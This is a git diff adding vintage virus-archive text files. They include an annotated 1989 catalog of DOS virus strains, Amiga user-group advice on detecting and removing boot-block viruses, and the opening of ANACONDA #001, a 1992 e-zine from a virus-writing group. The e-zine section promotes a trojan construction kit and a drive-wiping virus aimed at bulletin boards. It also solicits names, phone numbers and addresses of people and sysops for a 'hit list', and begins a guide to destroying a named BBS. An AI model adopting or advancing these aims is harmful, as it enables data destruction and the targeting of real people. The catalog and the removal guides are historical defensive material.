+replicates at boot time -- and infects only +5 1/4" 360KB floppies. It saves the real boot sector at track 39, +sector 8, head 0. Contains a count of the number of times it has +infected other diskettes, although it is referenced for write only and is +not used as part of an activation algorithm. The virus +remains resident at all times after it is booted, even if no +floppy is booted and BASIC is loaded. Contains a rare POP +CS instruction that makes it incapable of infecting 286 +systems. + + ALAMEDA-B (Also called Sacramento Virus) + + This is the original Alameda Virus that has the POP CS + removed. Relocation is accomplished through a long jump + instruction. All other characteristics are identical. This + version runs OK on a 286. + + ALAMEDA-C + + This is the Alameda-B virus that has been modified to + disable the boot function after 100 infections. The + counter in the original Alameda virus has been re-activated + and is interrogated at each bootup. When it reaches 100 the + virus disconnects from the original boot sector (control is + no longer passed) and the diskette will no longer boot. At + infection time, the counter is zeroed on the host diskette. + + SF VIRUS + + This is the Alameda-C that has been modified to format the + boot diskette when the counter runs out. + + GOLDEN GATE VIRUS (Also called The 500 Virus) + + This is the SF Virus that has been modified to format the C + drive when the counter runs out. The activation occurs + after 500 infections, instead of 100 infections. Note that + in all three of these strains, the counter is zeroed on the + host diskette at infection time. Thus, the activation + period on this virus will on the average stretch into many + years. No corruption will occur until 500 new diskettes + have been infected from within a given machine. Since the + infection can only occur when the system is booted with a + new diskette, infection is not frequent with this virus. I + expect that the overwhelming majority of infections will + never activate. The IBM PC will have long since been + supplanted by another architecture in most environments. + + GOLDEN GATE-B + + This virus is the Golden Gate virus that has had the + activation delay reset to 30 infections. This virus should + activate within a couple of years in most environments. + + GOLDEN GATE-C (Also called the Mazatlan Virus) + + This virus is the Golden Gate virus that is able to infect a + hard disk. It is a nasty virus, since it has more of an + opportunity to do damage than previous versions. Prior + versions were limited since systems with hard disks are only + infrequently booted from floppy and booting from hard disk + overwrote earlier versions. + + GOLDEN GATE-D + + This virus is identical to number 7, except the counter has + been disabled (similar to original Alameda). + +[BRAIN VIRUS AND VARIANTS] + +(Also called, Pakistani Brain; Basit Virus) + +This virus originated in January, 1986, in Lahore Pakistan. +It is the only virus yet discovered that includes the valid +names address and phone numbers of the original +perpetrators. The Brain is a boot sector infector, +approximately 3K in length, that infects 5 1/4" floppies. +It cannot infect hard disks. It will infect a diskette +whenever the diskette is referenced. For example, a +Directory command, executing a program from the diskette, +copying a file from or to the diskette or any other access +will cause the infection to occur. The virus stores the +original boot sector, and six extension sectors, containing +the main body of the virus, in available sectors which are +then flagged as bad sectors. + +The virus is able to hide from detection by intercepting any +interrupt that might interrogate the boot sector and re- +directing the read to the original boot sector. Thus, +programs like the Norton Utilities will be unable to see the +virus. + +Infected diskettes are noticeable by "@BRAIN" displayed in +the volume label. + + BRAIN-B (Also called Brain-HD; the Hard Disk Brain; Houston Virus) + + This virus is identical in every respect to the original + Brain, with the single exception that it can infect the C + drive. + + BRAIN-C + + This virus is the Brain-B that has the volume label code + removed. The volume label of infected diskettes does not + change with this virus. This virus was difficult to detect + since it does nothing overt in the system. + + CLONE VIRUS + + This virus is the Brain-C that saves the original boot + copyright label and restores it to the infected boot. The + Basit & [A]mjad original Brain messages have been replaced with + non-printable garbage that looks like instructions if viewed + through Norton or other utility. Even if the system is + booted from a clean diskette, it is virtually impossible to + tell, by visual inspection, whether the hard disk is + infected. + + SHOE_VIRUS (Also called UIUC Virus) + + This virus is the Brain-B Virus that has been modified to + include the message - "VIRUS_SHOE RECORD, v9.0. Dedicated + to the dynamic memories of millions of virus who are no + longer with us today". The message is never displayed. + + [I would also tentively identify this with the ashar virus as we + have a VIRUS_SHOES RECORD v9.0 with the identifying string ashar at + offset 04a6hex] + + + SHOE_VIRUS-B + + This is the Shoe_Virus that has been modified to so that it + can no longer infect hard disks. The v9.0 has been changed to + v9.1. + + [Have to question this we have a version of Brain with VIRUS_SHOE + RECORD v9.0 which is incapable of activating a virus stored on hard + disk due to the drive number being hardwired into the read routine + for loading the virus. I suspect v9.1 may be the hard disk variant.] + + ClONE-B + + This is the Clone virus that has been modified to corrupt + the FAT when it is booted after May 5, 1992. There are no + other apparent modifications. + + [JORK VIRUS] + + [This virus is the Shoe virus with the identifying text at + offset 0010hex reduced to "Welcome to the Dungeon (c) 1986 Brain", with + the text at 0202hex reading "(c) 1986 Jork & Amjads (pvt) Ltd".] + + [TERSE SHOE VIRUS] + + [A variant of Shoe virus with the initial text message truncated to + a single line] + +[ITALIAN VIRUS AND VARIANTS] + +(Also Called Bouncing Ball; Vera cruz) + +This is a boot sector virus that was first reported in March +1988. It is a floppy-only infector. + +When this virus activates (randomly) a bouncing dot appears +on the screen and can only be removed through reboot. No +other damage is done. + + ITALIAN-B + + This is a variation of Italian that is able to infect + Hard disks. + + [Obviously they have been spared this virus which I find suprising, this + does not seem to be based on first hand evidence] + + +[NEW ZEALAND AND VARIANTS] + +(Also called Stoned Virus) + +This is a boot sector infector that infects 360 KB 5 1/4" +floppies. It was first reported in Wellington, New Zealand +in early 1988). It displays - "Your computer is now stoned. +Legalize Marijuana" every 8th bootup. No overt damage. +Unable to infect hard disk. + + NEW ZEALAND-B + + Variation of New Zealand. Has been changed to be able to infect + hard disks. The hard disk is infected as soon as an + infected floppy is booted. No intentional damage done, + except systems with RLL controllers will frequently hang. + + NEW ZEALAND-C + + This is the Stoned-B virus that no longer displays the + "Stoned" message. This virus is difficult to detect. + + +[SEARCH AND VARIANTS] + +(Also called Den Zuk; Venezuelan) + +This is a boot sector infector that infects 360KB 5 1/4" +floppies. It infects through any access to the host +diskette. It can survive a warm reboot. It will infect +data (non-system) diskettes, which in turn can pass on the +infection if an accidental attempt to boot from the data +disk occurs. It has a bug which causes it incorrectly +attempt to infect 3.5" diskettes. This will overwrite the +diskette's FAT and cause a read (or write) failure. It +cannot infect a hard disk, and will not attempt to do so. +If an infected system is rebooted from the hard disk, the +virus will de-activate. This is not the case with rebooting +from a clean floppy - which will become infected. + +The virus causes CGA, EGA and VGA screens to display a +purple "DEN ZUK" graphic to appear after a -- +. It causes no damage. + + SEARCH-HD + + This virus is identical to the Search Virus, except it's + able to infect hard disks. + + SEARCH-B + + This virus is identical to the Search virus, but + unsuccessful modifications have been made to fix the 3.5" + diskette problem. The 3.5" infection still fails, plus + unsuccessful attempts to infect the hard disk will occur + which result in system failure in some systems. + + SYS VIRUS + + This virus is really a modification of the Search-HD virus. + The display code has been replaced (no display occurs on + reboot) by code that disables the SYS program. The SYS + program itself is not modified, but any attempt to execute + SYS will result in the program not being loaded. Instead, + multiple reads to the source and target drives will occur + (to simulate the SYS activity). The normal SYS message + output is displayed by the virus at the appropriate time. + This virus will successfully avoid being removed by SYS. + The virus does no damage. + + SYS-B + + This is similar to the SYS virus, but it performs a hard + disk format on any Friday 13th after 1990. This virus, and + its precursor virus both still contain the 3.5" bug, so that + they are easily detected on systems using 3.5" drives. They + are difficult to detect on other systems. + + SYS-C + + Similar to the SYS virus but performs random reboots + beginning 2 hours after power-on or initial boot. + +[COMMAND.COM VIRUSES] +[-------------------] + +LEHIGH + +This is a COMMAND.COM infector that first surfaced at Lehigh +University in late 1987. It is the widest known virus, the +most discussed and the most analyzed of all the viruses, so +I won't waste any more time on it. + +[A pity since there is now a further variant] + + [LEHIGH-2] + + [A version of the Lehigh virus modified to retain its infection + counter in RAM, and to only trigger the destructive phase when the + counter reaches 10 infections the disk FAT table is nulled] + +[TRANSIENT OBJECT FILE VIRUSES] +[-----------------------------] + +[DOS-62 AND VARIANTS] + +(Also called the UNESCO Virus) + +This virus is a COM infector. It was first discovered in +Moscow in April, 1988. It was first publicized in August +1988 when it cropped up at a children's computer Summer camp +run by UNESCO. When a program infected by this virus is +executed, it infects one other COM file in the system. On a +random basis, infected programs will perform a system re- +boot when they are executed. + + 62-B + + This virus is similar to DOS-62 except the re-boot is + replaced by deleting the executed program. + +[FRIDAY THE 13th] + +[Here lies a problem, this virus is totally different from the Israeli + Friday 13th strain, for one thing it is transient in that it does not + hook interrupts and remain active in memory] + +(Also called COM Virus; 512 virus) + +This virus is a non-resident COM infector that first +appeared in South Africa in 1987. At each execution of an +infected program the virus seeks out two other COM files on +the C drive and one COM file on the A drive and infects +them. The virus is extremely fast and the only indication +of infection occurring is the access light on the A drive +(if the current drive is C). The virus will only infect a +file once. + +On every Friday 13 the virus deletes the host program if it +is executed on that day (similar to the Jerusalem). + + Friday 13th-B + + This virus is identical to the original except that it + infects every file in the current subdirectory. The only + way this virus can spread beyond the current subdirectory is + if an infected program ends up in the system PATH. Then + every COM file in the currently selected subdirectory will + get infected. + + Friday 13th-C + + This is the 13th-B except a message has been added that + displays - "We hope we haven't inconvenienced you" appears + whenever the virus activates. + + +[AUSTRIAN VIRUS AND VARIANTS] + +(Also called the 648 Virus) + +This is a COM infector that increases the size of the +infected file by 648 bytes. It was first reported in London +in the fall of 1988. It is not a memory resident virus. It +infects the next uninfected COM file in the current +directory (similar to the original Friday 13th). It does no +overt damage. + + AUSTRIAN-B + + This is similar to the original, but it causes infrequent errors + in the infected COM file so that the file will not execute. + Approximately one file in ten will be corrupted. + + +[405 VIRUS] + +[A .COM infecting overwritting virus, similar to the Virus 1.1 published + in Ralf Burger's book. Infected files are destroyed and replaced by the + 405 byte long virus code.] + +[RESIDENT OBJECT FILE VIRUSES] +[----------------------------] + +[JERUSALEM VIRUS AND VARIANTS] + +(Also called Israeli; Friday the 13th; PLO) + +This virus is a memory resident COM and EXE infector. It +was first discovered at the Hebrew University in Jerusalem +in the fall of 1987. It contains a flaw which makes it re- +infect EXE files over and over until the files become too +big to fit into memory. The virus re-directs interrupt 8 +(among others) and one-half hour after an infected program +loads, the new timer interrupt introduces a delay which +slows down the processor by a factor of about 10. On every +Friday the 13, the virus deletes every program executed +during the day. + +[The sUMsDos variant I assume] + + JERUSALEM-B + + This virus is identical to the Jerusalem except it is able + to successfully identify pre-existing infections in EXE + files and will only infect them once. + + JERUSALEM-C + (Also called the New Jerusalem) + + This virus is identical to Jerusalem-B except that the timer + interrupt delay code has been bypassed. This virus is + virtually invisible until it activates. + + BLACK HOLE + (Also called the Russian Virus) + + This virus is the Jerusalem-C that has odd text and + additional code that is never referenced. A new interrupt + eight routine is added to the non referenced area and a + number of interrupt 21 calls which appear meaningless. The + additional text includes - "ANTIVIRUS". It appears that + this virus is a modified version of some previous variety of + the Jerusalem which we have not yet seen. + + JERUSALEM-D + + This is the Jerusalem-C that destroys both versions of the + FAT on any Friday the 13th after 1990. The code that + originally deleted executed programs has been overwritten + with the FAT destructive code. + + JERUSALEM-E + + This is identical to the D variety except the activation is + any Friday the 13th after 1992. + + CENTURY VIRUS (Also called the Oregon Virus) + + This is similar to the Jerusalem-C except the activation + date is January 1, 2000. When the virus activates, it + erases both FATs on all connected drives and then begins + writing zeroes to every sector on every attached device. If + allowed to continue to completion, it displays the message - + " Welcome to the 21st Century". + + CENTURY-B + + This virus is similar to the original Century virus with the + following exception: + + It waits for BACKUP.COM to be executed and then garbles all + program writes. After BACKUP terminates, the output + functions return to normal. + +[No mention of the sURIV 3.00 variant here] +[Nor any of the April 1st sURIV 1.01 and sURIV 2.01 viruses] + +[APRIL 1ST AND VARIANTS] + +[A memory resident .COM infecting virus which displays the message + "APRIL 1ST HA HA HA YOU HAVE A VIRUS" on April 1st after memory is infected by + execution of an infected .COM file and a further .COM file is executed. + + The system locks up requiring a reboot. This virus has the identifying text + string sURIV 1.01. + + APRIL 1st-B + + A .EXE infecting version of .COM which will display the characteristic + message on execution of any infected .EXE file on April 1st, with + associated lockup. A similar lockup will occur 1 hour after infection + of memory on any day on which the default date 1-1-80 is used.] + +[CASCADE VIRUS AND VARIANTS] + +(Also called 1701; Falling Tears; [Autumn Leaves]) + +This virus evolved from a trojan horse disguised as a +utility to automatically turn off the num-lock light at +system boot. The trojan horse caused the characters on the +screen to fall to the bottom of the screen in systems with +CGA monitors. In late 1977 this trojan horse was turned +into a memory resident COM virus. It gets it's name from +the size increase of infected COM files - 1701 bytes. The +virus has some unique qualities: + - It uses an encryption algorithm to avoid detection + and complicate any attempted analysis. + - It contains a sophisticated activation algorithm + that is based on randomizations, machine types, + monitor type, presence or absence of clock cards, + and time of year. + - It was designed to infect only IBM clones. True + IBM systems would be spared. +The virus has a bug that causes the machine selection +algorithm to fail. The virus activates on any machine with +a CGA or VGA monitor, in the months of September, October, +November or December in the year 1980 or 1988 (systems +without clock cards will often have a date set to 1980). + + CASCADE-B + + This virus is identical to the cascade except that it activates + in the fall of any year. + + 1704 [(Also called Blackjack)] + + I would prefer to classify this virus as a variety of the + 1701 but it has been universally referred to as a separate + virus, so I will go along with the crowd on this one. It is + + [Nope I have compared the code, identical except for a single instruction, + in my book that counts as the same virus] + + functionally identical to the 1701 except that the IBM + selection bug has been repaired. The new virus is three + bytes longer. In every other respect it is the same. + + 1704-B + + This virus is identical to the 1704, except the cascade + display has been replaced with a system re-boot when the + virus activates. The activation uses the same interrupt 8 + randomization algorithm, so the reboot will occur at a + random time interval after executing an infected program on + or after the activation date. + + 1704-C + + This virus is the same as the 1704-B, except the activation + date has been changed to occur in December of any year. + + 1704-D + + This virus is the same as the 1704, except the IBM selection + has been disabled (the virus infects true IBM PCs). + +[No mention either of the Dbase virus Ross reported recently, of the Oropax + reported by Klaus Brunnstein, so] + +[DBASE VIRUS] + +A memory resident .COM/.EXE virus. When an infected application is executed +the virus will install in memory looking for an open operation on .DBF files, +any writes would thereafter have two bytes transposed at random, their +location being recorded in the file BUG.DAT in the .DBF directory. Reads of +data would be corrected by the resident portion of the virus, thus data +appeared correct. After 90 days the virus would null the root directory and +FAT structures. + +[OROPAX VIRUS] + +(alias music virus) + +A memory resident .COM infecting virus. When an infected application is +executed the virus installs in memory trapping the DOS 21h interrupt. Thereafter +when a program attempts a create subdirectory, remove subdirectory, create +file, open file, delete file, get/set file attributes, rename file, delete file +(FCB), create file (FCB) or rename file (FCB) call one .COM file is infected +in the home directory. Command.com, com files with length divisible by 51, +com files with attribute other than normal or archive or com files with +length > 61980 bytes will not be infected. If based on a random number +the virus activates it will play 3 melodies repeatedly with a 7 minute +interval. + +[In addition I have reports of a further transient object file virus] +[ + In general the virus list seems very comprehensive listing as it does a + large number of variants of the more common viruses. It does seem to omit + detail on the Italian and Lehigh viruses in particular which any list + seeking to be comprehensive must include. I suggest that it would be + very useful to contact the author and arrange for a pooling of resources. + + We now have 5 separate lists of IBM viruses in preparation. Klaus' + catalog is very detailed (from the sample entries I have examined) although + I doubt if it can achieve the coverage that Jim Goodwin's list has. As + always it comes down to arranging that we receive, disassemble and + detail new virus strains when they are discovered. Having a number of + centres world wide seems an unnecessary duplication of effort, made even + worse by the lack of sharing of information which occurs. We need a + standard format for virus reports, a list of contacts and the free + interchange of information between each of the existing sites (this should + include virus samples, disassemblies and analysis). + + Comp.virus can (I think) prove useful as a contact point through which we + can track new infections, although this will be supplanted by the + establishment of national centres with a reputation (and/or government + recognition) for work in this field. + + I am still collating information for an exhaustive catalog, although + indications are that with the explosion of the virus problem this is now + becoming a full time job. Co-operation is important. I entered the field + four months ago, and in that time I have seen how important the establishment + of these links is. Within the UK there are a number of isolated workers + in the virus field, this must change. + + Within the Mac field there is a mailing list (Macmash) where discussion + and technical analysis of new strains takes place. I stand by my original + view that there is a place for such a list for IBM PC systems in addition + to virus-l. Many of the viruses described above have never come to light + in reports on virus-l, this should also change. There have been a number + of excellent virus reports on virus-l which have provided very useful + symptomatic analyses of viruses, without providing too much technical + detail. + + Anyway, enough of the soapbox. Any comments on the above list, including + additions, omissions and corrections would be appreciated. The list seems + extensive, but lacks the detailed information required (for me at least) + to prepare user information and detection software for the above viruses. +] + +------------------------------------------------------------------------------ +Dave Ferbrache Internet +Dept of computer science Janet +Heriot-Watt University UUCP ..!mcvax!hwcs!davidf +79 Grassmarket Telephone +44 31-225-6465 ext 553 +Edinburgh, United Kingdom Facsimile +44 31-220-4277 +EH1 2HJ BIX/CIX dferbrache +------------------------------------------------------------------------------ + diff --git a/textfiles.com/virus/amigvir1.txt b/textfiles.com/virus/amigvir1.txt new file mode 100644 index 00000000..c7a80206 --- /dev/null +++ b/textfiles.com/virus/amigvir1.txt @@ -0,0 +1,72 @@ +I just return from a trip to Australia, and while looking through some of +the local computer magazines I spotted an interesting article in MEGACOMP, +an Aussie mag for the Amiga. The following is a letter submitted by "The +Fallen Angel". + + As a member of the POISON (Australian) Cracking Association, I would like +to comment on how well you have covered the subjectof viruses on the Amiga. + + Every comment you have made on each virus is 100% correct. But I would +like to point out htat after you said it might have been the MOVERS who made +the Byte Bandit Virus, I got in contact with them, and the MOVERS did not +make the Byte Bandit Virus. + + This got me asking around other Crackers to find out who had been +responsible, and eventually I found out who made it: it was the SCA again! + + They made the Byte Bandit Virus as a follow up to the SCA Virus, because +after they came out with the SCA, other cracking and hacking associations +said that they (SCA) only had the know how to make a harmless virus. Man, +did they prove EVERYONE Wrong! + + With the Byte Bandit, the SCA had now made the most damaging virus known +to AMIGA users throughout the world! + + They also said that there was no need now for them to make any more +viruses, as they had proved their point. They have invented Virus Killers +to make up for creating the viruses. + + If you don't have a Virus Killer, you can still test your disks for the +SCA virus by holding donw the left mouse button when you boot up your disks. + If you have a virus, your color screen will show a flash of GREEN for a +short time, until it gets to the DOS screen. + + I am not sure if this works with the Byte Bandit virus, as when I caught +it, I killed it with VACCINE 2.0 straight away. The best virus killing disk +at the moment is from Discovery Software International. It is called VIP +VIRUS INFECTION PROTECTION. In Australia it costs $79, and you can buy it +in most computer shops. + + If you have the Byte Bandit Virus, and you are working on something, the +virus may very well crash the machine, leaving you with all your hard work +LOST. I'm going to tell you something HIGHLY CONFIDENTIAL which only a very +few Cracking Teams know about. (Credit should go to the POISON CRACKING +TEAM, Australia.) + + If the Byte Bandit crashes your computer, hold down the LEFT ALT, LEFT +AMIGA, SPACE BAR< RIGHT AMIGA< and RIGHT ALT keys all at the same time. +This will give you back your Amiga just long enough (six minutes) to save +your work. + + If you have the Revenge Virus in memory, you can kill it by plugging a +joystick into port two, and holding down the fire button while re-booting. +To confirm that the virus has been killed in the memory of your Amiga, the +screen will turn RED. + + If the Byte-Warrior Virus is in memory and you put an infected SCA Virus +disk in the drive, the power light will flash and you will hear a beep. +This is the "tune" you mentioned in your virus story. + + The INSTALL command in workbench can kill 90% of the viruses around +today. But first, turn OFF you Amiga and make sure you put in a clean +(non-virus infected) disk. + + +............................................................................. + +I hope this article will help some Virus infected user out there... + + Paul M... + + + diff --git a/textfiles.com/virus/amigvir2.txt b/textfiles.com/virus/amigvir2.txt new file mode 100644 index 00000000..5631f7f6 --- /dev/null +++ b/textfiles.com/virus/amigvir2.txt @@ -0,0 +1,100 @@ + + + + +AMIGA VIRUS + +By ED EARING + +Although I am not an owner of an Amiga, and although I am not familiar with +much of AmigaDOS, I have read the following disturbing subject in a +couple of other user group publications. I will attempt to make +this report with findings gathered from articles authored by Larry Phillips +(Commodore Users of Bartlesville) and Jo-Ann Nemeth (Commodore Users Group of +Columbus, Ohio). + If you see this message appear: "Something wonderful has happened. Your +Amiga is alive!!!" Please become very concerned. + A European group called Swiss Cracking Association (SCA) is taking +the credit for this latest form of invasion. + The usual chain of events is this: + + An Amiga is booted with an infected disk. All works normally, with +no sign that anything is amiss. If you then reboot the machine with +Ctrl-Amiga-Amiga key, using an uninfected disk, the virus is +transmitted to the boot disk and it too becomes a "carrier," ready to pass it +on again, and so on. + If you have received any copies of programs from anyone ... user group, +friends, bulletin boards ... whatever, it is imperative that you test these +disks BEFORE doing a warm reboot. + So how do you know if your disks are infected already? What do you do? + Bill Koester of Commodore, Inc., has written a program, VCHECK, that +will determine whether a specific disk is indeed infected. The virus writes +to block 0 (zero), and one track 1 (0-1, 1-1). This is the same area used by +some commercial programs to record important disk information. The result +can be the destruction of the commercial program's usefulness. VCHECK +tests your computer's memory to see if it is infected with the virus. + + As a safeguard, until you are able to test your disks, do NOT use an +important and presumedly uninfected disk unless the disk is write protected +before you put it into the drive or if this is not possible, turn the Amiga +off for a minimum of 60 seconds and then on again. To erase the SCA +jokesters' little humor, do an INSTALL of an infected disk from AmigaDOS. The +problem with this procedure is that it rewrites blocks zero, and commercial +programs often use block zero for copy protection so an "Install" could ruin +the program. + Using a program like SECTORAMA (DiskZAP will not show it), look at +Block 1 (cyl 0, hd 0, sec 1). If the virus is present, then run INSTALL. +Then turn the power off/on. If you have booted from an infected disk, and have +used INSTALL to kill the virus (see above), rebooting WITHOUT powering +off/on will only reinfect the disk. + Instructions for 2 drives: + Use Kickstart 1.2 (Amiga 500 already has 1.2 built in). When the +Workbench prompt appears, place your disk with the virus check program in +drive DF0:. This disk will automatically check your current memory. If your +memory is clear of the virus proceed. If not, turn off the Amiga for at least +60 secnds and start the procedure over. + Next, place the suspect disk in drive (either DF1: or DF2: for the A2000) +and type at the "1>" prompt: vcheck1 (return). + If all is well, you will see this message: "Virus Check 1.0 by Bill +Koester (CATS). This disk is healthy." If not, you are told that this disk +has the virus. Then type at the "1>" prompt: install df1: (return). + Should you find that your copy of Workbench is infected, then type at the +"1>" install df1: (return). Now turn the power off/on for the 60 second + interval. + The best advice the writers give is when you receive a new disk place it +in a special place and do NOT use it until you have a chance to test it for +the virus. They include commercial disks in this warning. + I read that the virus-checking program should be on Quantum Link or +GEnie or perhaps some Amiga BBS's. If you have the programs, it would be a +good idea to donate them to your SIG library. + NMCUG Editor's Note: The virus has been found on beta-test (i.e., +pre-release not totally debugged) versions of commercial software, so it +is possible it could appear on brand-new just-out-of-the-box commercial +disks. Supposedly commercial software publishers are rectifying this +situation. +--------------------- +Reprinted from COMMODORE DIMENSIONS, +January 1988, published by New Mexico +Commodore User's Group, P.O. Box 37127, +Albuquerque, NM 87176. + +--------------------- +Some further notes: this text file was written some one-and-a-quarter years +ago, by my time (4/89), and although the information given within is more or +less correct, it is outdated. Since the SCA virus emerged, a slew of others +have appeared, most of which use the same methods to spread themselves (boot +block infection). I will not go into the specifics of these new viruses, but +would recommend that interested parties (ALL Amiga users) get a copy of Steve +Tibbet's program VirusX and read the accompanying documentation, which +goes into more detail about the different viruses. VirusX should be available +through your local Amiga user group or from the Fred Fish collection of disks. + +Some BBSes to call: + +Digit Mail Box (408) 258-5463 3/12/2400b 8N1 Milpitas, CA. BBS of 64/More + Commodore User Group. +HomeBase BBS (408) 988-4004 3/12/2400b 8N1 Santa Clara, CA. SysOp John D. + McAfee head of Computer Virus Industry Association. +OMX BBS (613) 731-3419 3/12/2400b 8N1 Ottawa, Canada. SysOp Steve Tibbet, + author of VirusX. + \ No newline at end of file diff --git a/textfiles.com/virus/amigvir3.txt b/textfiles.com/virus/amigvir3.txt new file mode 100644 index 00000000..139e8a76 Binary files /dev/null and b/textfiles.com/virus/amigvir3.txt differ diff --git a/textfiles.com/virus/anaco001.txt b/textfiles.com/virus/anaco001.txt new file mode 100644 index 00000000..8fb94033 --- /dev/null +++ b/textfiles.com/virus/anaco001.txt @@ -0,0 +1,267 @@ +@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$@#$%@#$%@#$% +%$#@ %$#@ +@#$% = ANACONDA - ANACONDA - ANACONDA - ANACONDA - ANACONA = @#$% +%$#@ ********************************************************************* %$#@ +@#$% ** AAA ** @#$% +%$#@ ** AAAA ** %$#@ +@#$% ** AAAAA ** @#$% +%$#@ ** AA AA NN NN AA CCCC OOO NN NN DDDDD AA ** %$#@ +@#$% ** AA AA NNN NN AAA CC CC OO OO NNN NN DD DD AAA ** @#$% +%$#@ ** AA AA NNNNNN AAAA CC OO OO NNNNNN DD DD AAAA ** %$#@ +@#$% ** AA AAAAA NN NNN AA AA CC CC OO OO NN NNN DD DD AA AA ** @#$% +%$#@ ** AA AAAAAA NN NN AA AAA CCCC OOO NN NN DDDDD AA AAA ** %$#@ +@#$% ********************************************************************* @#$% +%$#@ = VIPER - VIPER - VIPER - VIPER - VIPER - VIPER = %$#@ +@#$% @#$% +%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$#@%$@ + @#$% @#$% + %$#@ Viral Inclined Programming Experts Ring %$#@ + @#$% Proudly Presents to You... @#$% + %$#@ %$#@ + @#$% ANACONDA #001: The Official VIPER Electronic Mag. @#$% + %$#@ %$#@ + @#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$%@#$ + !!! !!! + !!! VIPER are: !!! + !!! * Stingray * Venom * Moribindity * !!! + !!! * Guido Sanchez * !!! + !!! !!! + !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + Greetings: NUKE * SKISM * RABID * HIF + +(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*) + Release Date: 01/22/92 +(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*) +-----> + +Anaconda is the Official VIPER Magazine. We hope to bring you a fairly decent + magazine based on wickedly polluted programs, as well as various interesting + "Compu-Fucks", etc. + +-----> + +Well, alright, we might have overdone it with the snake-like theme, but hey, + it's a lot better than "VIPER" and then maybe a mag called, "12 Octal", and + then have some stupid shit "code handles". Anyways, if you think it's lame, + that is fine, but if the next program you run says, "You're VIPERized!" Don't + come crying to us about it. Also, I am not basing on 40 Hex, just trying to + make a point. +VIPER formed about two years ago, and was primarily oriented in a single NPA, + which I don't plan to tell you much about. However, this NPA has more + loosers in it than you would believe, so it was necessary. Sort of. We + did not do very much. A trojan here, a trojan there. But nothing of much + interest. However, 1992 has come, and so we decided that would be a nice + time to pick up our activity. +Here is how the group is currently divided up... + + Stingray (me): Viral/Trojan Development, Crashing and Thrashing + Moribundity : Trojan Development, Crashing and Thrashing, Fake Accounts + Venom : Trojan Development, Supportative Ideas + Guido Sanchez: Viral/Trojan Development, Crashin' -n- Trashing + +-----> + +Within the past few weeks, we have released three programs. Here is a brief + rundown of what is is now available: + + THCK100 .ZIP - The Trojan Horse Construction Kit, v1.00. This simple + program will generate .ASM source code to construct trojans. You supply + the messages, drives to fry, how to fry them... You may also encrypt + the messages, and create unexecutable, uncompressable 'DATA' files to + distribute with. Now even a low-IQ individual can create convincing and + devastatingly vicious trojan horses. + BRENDA .ZIP - The Brenda Virus. A fairly simple tiny virus hack. It is + not much to be desired, but for the true collector, it is a decent + addition at only 255 bytes. Named for a girl at school... + VIPERIZE.ZIP - The VIPERizer Virus, strain A. This will probably be the + virus we will use to take out multiple boards in the same region. The + current versions activation date is Februrary 1st, 1992. After this + date, any program executed has a 1 in 20th chance to cause drive c-z + to be wasted. Normally, there is a 1 in 20 chance that an executed + program will display a message and delay for about 30 seconds. + +We also put out various trojan horses but hey, who the fuck cares now that + even a total moron could make one. + +-----> + +Man, I am really sorry that I have to put this in here. But it is more than + necessary. Apparently a lot of you corrupt programmer's, and even you + people who think you are crashers have got some serious problems with your + terminology. We're going to classify them so you can understand. I know + this does not apply to most of you, but when someone gives me a file and + it says, "The Fire Virus 1.00" for the description, and then I look it over + and it turns out that it is a trojan horse, but in the fuckin' unencrypted + text strings in it,it says "The Fire Virus" in it, something is WAY wrong. + + Trojan/Trojan Horse: Simple program that causes damage to a single + computer, and cannot spread. Often designed as + some kinda HD diagnostics or optimizer, etc. When + you think it is doing what it should, it is trashing + files, making directories, wasting sectors, etc. + Examples: HDOPT, FATFUCK, BOOTKILL, etc. + + Time Bomb: Simple program, could be a virus also, that at some + time or date it causes some form of computer damage. + Examples: Friday the 13th Virus, Violator Series, + etc. + + Virus: Program capable of infecting other files with itself. + Can spread to other kinds of computers. There are + many varieties such as Boot Sector, COM and EXE + infectors, etc. Of course, ones such as Jerusalem + can also infect SYS files and Overlays, etc. + + Worm/Network Worm: This is sort of a virus, except it often affects + networks rather than infecting all of a computer, + it might blip over the InterNet in five days or + so. + +A note on overwriting virii: Yes, it is possible they could spread to another + computer, if you copy an infected file, but you would have to be pretty + lame for that to happen. Also, there are classes of Virii, such as + encryptive, mutative/metamorphosis, stealth, etc. But, we don't need to get + into that. + +-----> + +Recently, myself and Venom have been using IRC, InterNet chat to piss off the + people in the #warez channel. Perhaps some day you will come and join us!!! + You may also reach us on the InterNet as: stingray@pro-nbs.cts.com. + +-----> + +VIPER has decided that it would be most important to keep accurate records of + true assholes and boards. If you feel that you would like to add to this + list, PLEASE! Mail us the info to the above InterNet address!!! If you would + like yourself to be on our MAILING list to receive Anaconda Magazine when it + is available, let us know at the address, also. Information we are looking + for on lamerz includes their handle, what NPA they're in,soem boards they + frequent, what makes then a laim0r, etc. If you have thier address, and/or + voice, then let us know. If you wish to add a BBS to our hitlist, we'll + need the name, number, SysOp's name, etc. If you have their voice number + address etc. send it along too!!! We will even consider scoring people + various scanners for some of our virii if you add to 'the hit list', so make + a fine addition today!!! +We're primarily looking to kill assholes of all sorts, but mostly the Warez + puppy fucker shits. What kind of life is Warez man!?! Fuck, if you are a + warezwolf and are reading this now, then fuck off you asshole! You are + all going to fry!!! +Finally, VIPERizer, Strain B should be out and about, and source code available + also, within the next few weeks, so be looking forward to it! +Well, I have put up enough bullshit, so now lets see what Guido has to say... + +-----> + + "Ethics and the Urge" + + Howdy all. Well, I'm sure you're looking at this article title and wondering +what the fuck I'm talking about. Well, you ever get the feeling, when you're +on what could be the worst board in the world, that you should put this board +out of its misery? NOW you know what the fuck I'm talking about. Lame boards. +This article will cover several ways to dispose of them, and also the ethics +involved in making someone's life miserable just because they are evolution- +arily ranked just below slime mold. +-------------------------------------------------------------------------------- +Case in point #1. +There's a certain board in Colorado, called the Sound Doctrine BBS {303-680- +7209}, and I call up. The place is a high class shareware PD board, with 3 +nodes, CD-ROM , and the +latest version of PKZIP. I logon, 